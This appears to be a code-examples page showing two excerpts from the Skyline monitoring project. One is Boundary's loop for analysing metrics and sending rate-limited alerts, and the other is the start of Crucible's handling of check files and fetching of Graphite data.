                        timeseries, metric_name,
                        metric_expiration_time,
                        metric_min_average,
                        metric_min_average_seconds,
                        metric_trigger,
                        alert_threshold,
                        metric_alerters,
                        autoaggregate,
                        autoaggregate_value,
                        algorithm
                    )
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug - analysed - %s' % (metric_name))
                else:
                    anomalous = False
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug - more unique metric tuple not analysed - %s' % (metric_name))

                # If it's anomalous, add it to list
                if anomalous:
                    anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]
                    self.anomalous_metrics.append(anomalous_metric)
                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info("exceptions['Other'] traceback follows:")
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process intializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Reset boundary_metrics
            boundary_metrics = []

            # Build boundary metrics
            for metric_name in unique_metrics:
                for metric in BOUNDARY_METRICS:
                    CHECK_MATCH_PATTERN = metric[0]
                    check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                    base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                    pattern_match = check_match_pattern.match(base_name)
                    if pattern_match:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - boundary metric - pattern MATCHED - " + metric[0] + " | " + base_name)
                        boundary_metrics.append([metric_name, metric[1]])

            if ENABLE_BOUNDARY_DEBUG:
                logger.info("debug - boundary metrics - " + str(boundary_metrics))

            if len(boundary_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.BOUNDARY_PROCESSES + 1):
                if i > len(boundary_metrics):
                    logger.info('WARNING: skyline boundary is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, boundary_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.BOUNDARY_ENABLE_ALERTS:
                for anomalous_metric in self.anomalous_metrics:
                    datapoint = str(anomalous_metric[0])
                    metric_name = anomalous_metric[1]
                    base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                    expiration_time = str(anomalous_metric[2])
                    metric_trigger = str(anomalous_metric[5])
                    alert_threshold = int(anomalous_metric[6])
                    metric_alerters = anomalous_metric[7]
                    algorithm = anomalous_metric[8]
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info("debug - anomalous_metric - " + str(anomalous_metric))

                    # Determine how many times has the anomaly been seen if the
                    # ALERT_THRESHOLD is set to > 1 and create a cache key in
                    # redis to keep count so that alert_threshold can be honored
                    if alert_threshold == 0:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - alert_threshold - " + str(alert_threshold))

                    if alert_threshold == 1:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - alert_threshold - " + str(alert_threshold))

                    if alert_threshold > 1:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - alert_threshold - " + str(alert_threshold))
                        anomaly_cache_key_count_set = False
                        anomaly_cache_key_expiration_time = (int(alert_threshold) + 1) * 60
                        anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name)
                        try:
                            anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key)
                            if not anomaly_cache_key_count:
                                try:
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - redis no anomaly_cache_key - " + str(anomaly_cache_key))
                                    times_seen = 1
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - redis setex anomaly_cache_key - " + str(anomaly_cache_key))
                                    self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                    logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                                except Exception as e:
                                    logger.error('redis setex failed :: %s' % str(anomaly_cache_key))
                                    logger.error("couldn't set key: %s" % e)
                            else:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - redis anomaly_cache_key retrieved OK - " + str(anomaly_cache_key))
                                anomaly_cache_key_count_set = True
                        except:
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info("debug - redis failed - anomaly_cache_key retrieval failed - " + str(anomaly_cache_key))
                            anomaly_cache_key_count_set = False

                        if anomaly_cache_key_count_set:
                            unpacker = Unpacker(use_list=False)
                            unpacker.feed(anomaly_cache_key_count)
                            raw_times_seen = list(unpacker)
                            times_seen = int(raw_times_seen[0]) + 1
                            try:
                                self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                            except:
                                times_seen = 1
                                logger.error('set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen)))

                    # Alert the alerters if times_seen > alert_threshold
                    if times_seen >= alert_threshold:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - times_seen %s is greater than or equal to alert_threshold %s" % (str(times_seen), str(alert_threshold)))
                        for alerter in metric_alerters.split("|"):
                            # Determine alerter limits
                            send_alert = False
                            alerts_sent = 0
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info("debug - checking alerter - %s" % alerter)
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determining alerter_expiration_time for settings")
                                alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter]
                                alerter_expiration_time = int(alerter_expiration_time_setting)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determined alerter_expiration_time from settings - %s" % str(alerter_expiration_time))
                            except:
                                # Set an arbitrary expiry time if not set
                                alerter_expiration_time = 160
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - could not determine alerter_expiration_time from settings")
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determining alerter_limit from settings")
                                alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter]
                                alerter_limit = int(alerter_limit_setting)
                                alerter_limit_set = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determined alerter_limit from settings - %s" % str(alerter_limit))
                            except:
                                alerter_limit_set = False
                                send_alert = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - could not determine alerter_limit from settings")

                            # If the alerter_limit is set determine how many
                            # alerts the alerter has sent
                            if alerter_limit_set:
                                alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                try:
                                    alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key)
                                    if not alerter_sent_count_key_data:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key))
                                        alerts_sent = 0
                                        send_alert = True
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - alerts_sent set to %s" % str(alerts_sent))
                                            logger.info("debug - send_alert set to %s" % str(sent_alert))
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - redis alerter key retrieved, unpacking" + str(alerter_sent_count_key))
                                        unpacker = Unpacker(use_list=False)
                                        unpacker.feed(alerter_sent_count_key_data)
                                        raw_alerts_sent = list(unpacker)
                                        alerts_sent = int(raw_alerts_sent[0])
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - alerter %s alerts sent %s " % (str(alerter), str(alerts_sent)))
                                except:
                                    logger.info("No key set - %s" % alerter_sent_count_key)
                                    alerts_sent = 0
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - alerts_sent set to %s" % str(alerts_sent))
                                        logger.info("debug - send_alert set to %s" % str(send_alert))

                                if alerts_sent < alerter_limit:
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit)))
                                        logger.info("debug - send_alert set to %s" % str(send_alert))

                            # Send alert
                            alerter_alert_sent = False
                            if send_alert:
                                cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - checking cache_key - %s" % cache_key)
                                try:
                                    last_alert = self.redis_conn.get(cache_key)
                                    if not last_alert:
                                        try:
                                            self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0])))
                                            if ENABLE_BOUNDARY_DEBUG:
                                                logger.info('debug - key setex OK - %s' % (cache_key))
                                            trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                            alerter_alert_sent = True
                                        except Exception as e:
                                            logger.error('alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            logger.error("couldn't send alert: %s" % str(e))
                                            trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - cache_key exists not alerting via %s for %s is less than alerter_limit %s" % (alerter, cache_key))
                                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                except:
                                    trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                            else:
                                trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

                            # Update the alerts sent for the alerter cache key,
                            # to allow for alert limiting
                            if alerter_alert_sent and alerter_limit_set:
                                try:
                                    alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                    new_alerts_sent = int(alerts_sent) + 1
                                    self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent)))
                                    logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                                except:
                                    logger.error('failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))

                    else:
                        # Always alert to syslog, even if alert_threshold is not
                        # breached or if send_alert is not True
                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(boundary_metrics))
            logger.info('total analyzed    :: %d' % (len(boundary_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_analyzed', '%.2f' % (len(boundary_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_anomalies', '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_metrics', '%d' % len(boundary_metrics))
            for key, value in exceptions.items():
                send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'anomaly_breakdown.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'duration', '%.2f' % time_human)
                self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Only run once per minute
            seconds_to_run = int((time() - now))
            if seconds_to_run < 60:
                sleep_for_seconds = 60 - seconds_to_run
            else:
                sleep_for_seconds = 0
            if sleep_for_seconds > 0:
                logger.info('sleeping for %s seconds' % sleep_for_seconds)
                sleep(sleep_for_seconds)
Ejemplo n.º 40
0
class Crucible(Thread):
    def __init__(self, parent_pid):
        """
        Initialize Crucible
        """
        super(Crucible, self).__init__()
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.process_list = Manager().list()
        self.metric_variables = Manager().list()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)

    def check_if_parent_is_alive(self):
        """
        Check if the parent process is alive
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, run_timestamp, metric_check_file):
        """
        Assign a metric for a process to analyze.

        :param i: python process id
        :param run_timestamp: the epoch timestamp at which this process was called
        :param metric_check_file: full path to the metric check file

        :return: returns True

        """

        child_process_pid = os.getpid()
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('child_process_pid - %s' % str(child_process_pid))

        self.process_list.append(child_process_pid)

        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('processing metric check - %s' % metric_check_file)

        if not os.path.isfile(str(metric_check_file)):
            logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
            return

        check_file_name = os.path.basename(str(metric_check_file))
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_name - %s' % check_file_name)
        check_file_timestamp = check_file_name.split('.', 1)[0]
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_timestamp - %s' % str(check_file_timestamp))
        check_file_metricname_txt = check_file_name.split('.', 1)[1]
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_metricname_txt - %s' % check_file_metricname_txt)
        check_file_metricname = check_file_metricname_txt.replace('.txt', '')
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_metricname - %s' % check_file_metricname)
        check_file_metricname_dir = check_file_metricname.replace('.', '/')
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_metricname_dir - %s' % check_file_metricname_dir)

        metric_failed_check_dir = failed_checks_dir + '/' + check_file_metricname_dir + '/' + check_file_timestamp
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('metric_failed_check_dir - %s' % metric_failed_check_dir)

        # failed_check_file = failed_checks_dir + '/' + check_file_name
        failed_check_file = metric_failed_check_dir + '/' + check_file_name

        # Load and validate metric variables
        try:
            metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
        except:
            logger.error('error :: failed to import metric variables from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            # TBD - a failed check Panorama update will go here, perhaps txt
            #       files are not the only "queue" that will be used, both, but
            #       Panorama, may be just a part of Skyline Flux, the flux DB
            #       would allow for a very nice, distributed "queue" and a
            #       distributed Skyline workforce...
            #       Any Skyline node could just have one role, e.g. lots of
            #       Skyline nodes running crucible only and instead of reading
            #       the local filesystem for input, they could read the Flux DB
            #       queue or both...
            return

        # Test metric variables
        # We use a pythonic methodology to test if the variables are defined,
        # this ensures that if any of the variables are not set for some reason
        # we can handle unexpected data or situations gracefully and try and
        # ensure that the process does not hang.

        # if len(str(metric_vars.metric)) == 0:
        # if not metric_vars.metric:
        try:
            metric_vars.metric
        except:
            logger.error('error :: failed to read metric variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            metric = str(metric_vars.metric)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - metric - %s' % metric)

        # if len(metric_vars.value) == 0:
        # if not metric_vars.value:
        try:
            metric_vars.value
        except:
            logger.error('error :: failed to read value variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            value = str(metric_vars.value)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - value - %s' % (value))

        # if len(metric_vars.from_timestamp) == 0:
        # if not metric_vars.from_timestamp:
        try:
            metric_vars.from_timestamp
        except:
            logger.error('error :: failed to read from_timestamp variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            from_timestamp = str(metric_vars.from_timestamp)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - from_timestamp - %s' % from_timestamp)

        # if len(metric_vars.metric_timestamp) == 0:
        # if not metric_vars.metric_timestamp:
        try:
            metric_vars.metric_timestamp
        except:
            logger.error('error :: failed to read metric_timestamp variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            metric_timestamp = str(metric_vars.metric_timestamp)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - metric_timestamp - %s' % metric_timestamp)

        # if len(metric_vars.algorithms) == 0:
        # if not metric_vars.algorithms:
        try:
            metric_vars.algorithms
        except:
            logger.error('error :: failed to read algorithms variable from check file setting to all' % (metric_check_file))
            algorithms = ['all']
        else:
            algorithms = []
            for i_algorithm in metric_vars.algorithms:
                algorithms.append(i_algorithm)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - algorithms - %s' % algorithms)

        # if len(metric_vars.anomaly_dir) == 0:
        # if not metric_vars.anomaly_dir:
        try:
            metric_vars.anomaly_dir
        except:
            logger.error('error :: failed to read anomaly_dir variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            anomaly_dir = str(metric_vars.anomaly_dir)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - anomaly_dir - %s' % anomaly_dir)

        # if len(str(metric_vars.graphite_metric)) == 0:
        try:
            metric_vars.graphite_metric
        except:
            logger.info('failed to read graphite_metric variable from check file setting to False')
            # yes this is a string
            graphite_metric = 'False'
        else:
            graphite_metric = str(metric_vars.graphite_metric)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - graphite_metric - %s' % graphite_metric)

        # if len(str(metric_vars.run_crucible_tests)) == 0:
        try:
            metric_vars.run_crucible_tests
        except:
            logger.info('failed to read run_crucible_tests variable from check file setting to False')
            # yes this is a string
            run_crucible_tests = 'False'
        else:
            run_crucible_tests = str(metric_vars.run_crucible_tests)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - run_crucible_tests - %s' % run_crucible_tests)

        try:
            metric_vars.added_by
        except:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('failed to read added_by variable from check file setting to crucible - set to crucible')
            added_by = 'crucible'
        else:
            added_by = str(metric_vars.added_by)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - added_by - %s' % added_by)

        try:
            metric_vars.run_script
        except:
            run_script = False
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - run_script - not present set to False')
        else:
            run_script = str(metric_vars.run_script)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - run_script - %s' % run_script)

        # Only check if the metric does not a EXPIRATION_TIME key set, crucible
        # uses the alert EXPIRATION_TIME for the relevant alert setting contexts
        # whether that be analyzer, mirage, boundary, etc and sets its own
        # cache_keys in redis.  This prevents large amounts of data being added
        # in terms of tieseries json and image files, crucible samples at the
        # same EXPIRATION_TIME as alerts.

        source_app = 'crucible'
        expiration_timeout = 1800
        remove_all_anomaly_files = False
        check_expired = False
        check_time = time()

        if added_by == 'analyzer' or added_by == 'mirage':
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('Will check %s ALERTS' % added_by)
            if settings.ENABLE_ALERTS:
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('Checking %s ALERTS' % added_by)
                for alert in settings.ALERTS:
                    ALERT_MATCH_PATTERN = alert[0]
                    METRIC_PATTERN = metric
                    alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                    pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                    if pattern_match:
                        source_app = added_by
                        expiration_timeout = alert[2]
                        if settings.ENABLE_CRUCIBLE_DEBUG:
                            logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
                        check_age = int(check_time) - int(metric_timestamp)
                        if int(check_age) > int(expiration_timeout):
                            check_expired = True
                            if settings.ENABLE_CRUCIBLE_DEBUG:
                                logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')

        if added_by == 'boundary':
            if settings.BOUNDARY_ENABLE_ALERTS:
                for alert in settings.BOUNDARY_METRICS:
                    ALERT_MATCH_PATTERN = alert[0]
                    METRIC_PATTERN = metric
                    alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                    pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                    if pattern_match:
                        source_app = 'boundary'
                        expiration_timeout = alert[2]
                        if settings.ENABLE_CRUCIBLE_DEBUG:
                            logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
                        check_age = int(check_time) - int(metric_timestamp)
                        if int(check_age) > int(expiration_timeout):
                            check_expired = True
                            if settings.ENABLE_CRUCIBLE_DEBUG:
                                logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')

        cache_key = 'crucible.last_check.%s.%s' % (source_app, metric)
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('cache_key - crucible.last_check.%s.%s' % (source_app, metric))

        # Only use the cache_key EXPIRATION_TIME if this is not a request to
        # run_crucible_tests on a timeseries
        if run_crucible_tests == 'False':
            if check_expired:
                logger.info('check_expired - not checking Redis key')
                last_check = True
            else:
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('Checking if cache_key exists')
                try:
                    last_check = self.redis_conn.get(cache_key)
                except Exception as e:
                    logger.error('error :: could not query cache_key for %s - %s - %s' % (alerter, metric, e))
                    logger.info('all anomaly files will be removed')
                    remove_all_anomaly_files = True

            if not last_check:
                try:
                    self.redis_conn.setex(cache_key, expiration_timeout, packb(value))
                    logger.info('set cache_key for %s - %s with timeout of %s' % (source_app, metric, str(expiration_timeout)))
                except Exception as e:
                    logger.error('error :: could not query cache_key for %s - %s - %s' % (alerter, metric, e))
                    logger.info('all anomaly files will be removed')
                    remove_all_anomaly_files = True
            else:
                if check_expired:
                    logger.info('check_expired - all anomaly files will be removed')
                    remove_all_anomaly_files = True
                else:
                    logger.info('cache_key is set and not expired for %s - %s - all anomaly files will be removed' % (source_app, metric))
                    remove_all_anomaly_files = True

        # anomaly dir
        if not os.path.exists(str(anomaly_dir)):
            try:
                mkdir_p(skyline_app, str(anomaly_dir))
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('created anomaly dir - %s' % str(anomaly_dir))
            except:
                logger.error('error :: failed to create anomaly_dir - %s' % str(anomaly_dir))

        if not os.path.exists(str(anomaly_dir)):
            logger.error('error :: anomaly_dir does not exist')
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('anomaly dir exists - %s' % str(anomaly_dir))

        failed_check_file = anomaly_dir + '/' + metric_timestamp + '.failed.check.' + metric + '.txt'
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('failed_check_file - %s' % str(failed_check_file))

        # Retrieve data from graphite is necessary
        anomaly_graph = anomaly_dir + '/' + metric + '.png'
        anomaly_json = anomaly_dir + '/' + metric + '.json'
        anomaly_json_gz = anomaly_json + '.gz'
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('anomaly_graph - %s' % str(anomaly_graph))
            logger.info('anomaly_json - %s' % str(anomaly_json))
            logger.info('anomaly_json_gz - %s' % str(anomaly_json_gz))

        # Some things added to crucible may not be added by a skyline app per se
        # and if run_crucible_tests is string True then no anomaly files should
        # be removed.
        if run_crucible_tests == 'True':
            remove_all_anomaly_files = False

        # Remove check and anomaly files if the metric has a EXPIRATION_TIME
        # cache_key set
        if remove_all_anomaly_files:
            if os.path.isfile(anomaly_graph):
                try:
                    os.remove(anomaly_graph)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_graph removed - %s' % str(anomaly_graph))
                except OSError:
                    pass
            if os.path.isfile(anomaly_json):
                try:
                    os.remove(anomaly_json)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_json removed - %s' % str(anomaly_json))
                except OSError:
                    pass
            if os.path.isfile(anomaly_json_gz):
                try:
                    os.remove(anomaly_json_gz)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_json_gz removed - %s' % str(anomaly_json_gz))
                except OSError:
                    pass

            anomaly_txt_file = anomaly_dir + '/' + metric + '.txt'
            if os.path.isfile(anomaly_txt_file):
                try:
                    os.remove(anomaly_txt_file)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_txt_file removed - %s' % str(anomaly_txt_file))
                except OSError:
                    pass

            # TBD - this data would have to be added to the panaorama DB before
            #       it is removed
            if os.path.isfile(str(metric_check_file)):
                try:
                    os.remove(str(metric_check_file))
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('metric_check_file removed - %s' % str(metric_check_file))
                except OSError:
                    pass

            if os.path.exists(str(anomaly_dir)):
                try:
                    os.rmdir(str(anomaly_dir))
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_dir removed - %s' % str(anomaly_dir))
                except OSError:
                    pass

            logger.info('check and anomaly files removed')
            return

        # Check if the image exists
        if graphite_metric == 'True':

            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('graphite_metric - %s' % (graphite_metric))

            # Graphite timeouts
            connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('connect_timeout - %s' % str(connect_timeout))

            read_timeout = int(settings.GRAPHITE_READ_TIMEOUT)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('read_timeout - %s' % str(read_timeout))

            graphite_until = datetime.datetime.fromtimestamp(int(metric_timestamp)).strftime('%H:%M_%Y%m%d')
            graphite_from = datetime.datetime.fromtimestamp(int(from_timestamp)).strftime('%H:%M_%Y%m%d')

            # graphite URL
            if settings.GRAPHITE_PORT != '':
                url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
            else:
                url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('graphite url - %s' % (url))

            if not os.path.isfile(anomaly_graph):
                logger.info('retrieving png - surfacing %s graph from graphite from %s to %s' % (metric, graphite_from, graphite_until))

                image_url = url.replace('&format=json', '')
